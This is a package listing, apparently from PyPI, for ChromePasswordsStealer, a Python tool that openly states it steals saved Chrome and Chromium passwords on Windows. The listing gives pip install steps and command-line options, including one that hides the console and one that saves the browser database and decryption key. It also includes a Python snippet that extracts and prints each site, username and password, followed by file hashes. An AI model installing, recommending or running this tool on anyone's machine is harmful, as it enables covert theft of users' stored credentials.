This module steals chrome and chromium passwords on Windows
Project description
ChromePasswordsStealer
Description
This module steals chrome and chromium passwords on Windows.
Requirements
This package require:
- python3
- python3 Standard Library
- pywin32
- PythonToolsKit
- PyCryptodome
Installation
pip install ChromePasswordsStealer
Usages
Command lines
# Python executable
python3 ChromePasswordsStealer.pyz -h
# or
chmod u+x ChromePasswordsStealer.pyz
./ChromePasswordsStealer.pyz --help
# Python module
python3 -m ChromePasswordsStealer
# Entry point (console)
ChromeStealer --save-all --window -f passwords
Python script
from ChromePasswordsStealer import ChromePasswordsStealer
stealer = ChromePasswordsStealer()
stealer = ChromiumPasswordsStealer("passwords", True)
stealer.get_database_cursor()
stealer.get_key()
for url, username, password in stealer.get_credentials():
print(url, username, password)
stealer.save_and_clean()
Help
~# python3 ChromePasswordsStealer.py -h
usage: ChromePasswordsStealer.py [-h] [--filename FILENAME] [--window] [--save-all]
This program steals Chrome passwords on Windows.
optional arguments:
-h, --help show this help message and exit
--filename FILENAME, -f FILENAME
The filename to export the credentials.
--window, -w Do not hide the console.
--save-all, -s Save chrome db, key file and key.
Links
- Github Page
- Documentation
- Python Executable
- Windows Executable - Github
- Windows Executable - SourceForge
- Pypi package
Licence
Licensed under the GPL, version 3.
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
File details
Details for the file ChromePasswordsStealer-1.0.2.tar.gz
.
File metadata
- Download URL: ChromePasswordsStealer-1.0.2.tar.gz
- Upload date:
- Size: 20.4 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.2.0 pkginfo/1.6.1 requests/2.25.0 setuptools/59.6.0 requests-toolbelt/0.9.1 tqdm/4.54.1 CPython/3.9.11
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | ccd38196ef62c5de994c4c38a39211eba64d370c196bb3c1747dce44e3eb0d1f |
|
MD5 | 69d0944d170bb894ea437b5e2d3290b8 |
|
BLAKE2b-256 | b7789ee2e6ec398c95bc03a33534b85cc066cf934a8ce5b8b22f538543aba1e8 |